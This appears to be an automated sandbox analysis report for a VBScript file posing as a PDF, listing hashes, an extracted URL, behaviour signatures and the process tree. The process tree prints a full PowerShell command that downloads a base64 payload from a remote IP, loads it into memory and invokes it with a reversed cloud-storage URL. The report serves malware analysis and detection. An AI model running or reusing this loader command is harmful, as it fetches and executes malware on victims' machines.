Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 02:29
Static task
static1
Behavioral task
behavioral1
Sample
BXA09QOPKJHVRFVU_001_PDF.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
BXA09QOPKJHVRFVU_001_PDF.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
RWVQ04HDJSNYKSDF03BD_002_PDF.vbs
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
RWVQ04HDJSNYKSDF03BD_002_PDF.vbs
Resource
win10v2004-20241007-en
General
-
Target
RWVQ04HDJSNYKSDF03BD_002_PDF.vbs
-
Size
129KB
-
MD5
1befa9ba6ebbb499691b9ba6e4dec4ae
-
SHA1
a39f41c971b09a4928c86717deab8cfb5242bc52
-
SHA256
f119b656cd5a8a68ac35e37d8da3b090300757afda4616f67ba13369f20e459c
-
SHA512
91f7550d39963faa56df8116fadd44977fffbc22a0d92e2c43f95116276fa154633785a7bf1f0c5d1e644211f880ea44a57968a85670f5481cacdef67a96a06b
-
SSDEEP
48:qTlqlqlqlqlqlqlqllgu3gMg1gxg9gfgdWegXgtogEPgNogZg2gkgE3Vo9jgLE3M:eAAAAAAAN/edkUDVo9teK7vtReq0yO
Malware Config
Extracted
http://20.106.255.48/dll/lnk.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1768 powershell.exe -
pid Process 1768 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1768 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1476 wrote to memory of 1768 1476 WScript.exe 30 PID 1476 wrote to memory of 1768 1476 WScript.exe 30 PID 1476 wrote to memory of 1768 1476 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RWVQ04HDJSNYKSDF03BD_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/lnk.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('a2ffd275242b-2c58-8cf4-d0d6-6c8ebba9=nekot&aidem=tla?txt.40WHT/o/moc.topsppa.edfd7-pohe/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-